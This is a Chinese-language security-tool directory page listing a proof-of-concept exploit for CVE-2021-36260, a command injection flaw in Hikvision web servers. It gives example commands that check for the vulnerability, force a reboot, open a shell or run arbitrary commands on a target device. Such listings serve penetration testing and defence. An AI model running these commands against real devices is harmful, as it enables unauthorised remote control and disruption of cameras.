Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-36260 — 某些海康威视产品的Web服务器存在命令注入漏洞。由于输入验证不足,攻击者可以通过发送带有恶意命令的消息来利用该漏洞发起命令注入攻击。 | Kitploit
工具/GitHubGitHub/aiminsun/cve-2021-36260
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubaiminsun/cve-2021-36260

CVE-2021-36260

某些海康威视产品的Web服务器存在命令注入漏洞。由于输入验证不足,攻击者可以通过发送带有恶意命令的消息来利用该漏洞发起命令注入攻击。

查看仓库
2977974年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-36260

CVE-2021-36260 POC 命令注入漏洞,存在于某些海康威视产品的Web服务器中。由于输入验证不足,攻击者可利用该漏洞,通过发送带有恶意命令的消息来发起命令注入攻击。

漏洞标题: Hikvision Web Server Build 210702 - Command Injection

漏洞作者: bashis

厂商主页: https://www.hikvision.com/

版本: 1.0

CVE: CVE-2021-36260

参考: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html

所有功劳归 Watchful_IP

注意:

  1. 此代码 不会 验证远程设备是否为海康威视设备。
  2. 本代码的主要关注点在于如何可靠地检测存在漏洞和/或可利用的设备。 某些设备易于检测、验证和利用漏洞,其他设备可能存在漏洞但不易验证和利用。 我认为组合验证代码应具有非常高的准确性。
  3. '安全检测' (--check) 将尝试写入和读取以进行验证 '不安全检测' (--reboot) 将尝试重启设备以进行验证

[Examples] 安全漏洞/验证检测: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check

安全和非安全漏洞/验证检测: (仅当未通过'安全检测'验证时,才使用'不安全检测') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot

不安全漏洞/验证检测: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot

启动并连接到SSH Shell: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell

执行命令: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"

执行盲命令: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"

下载工具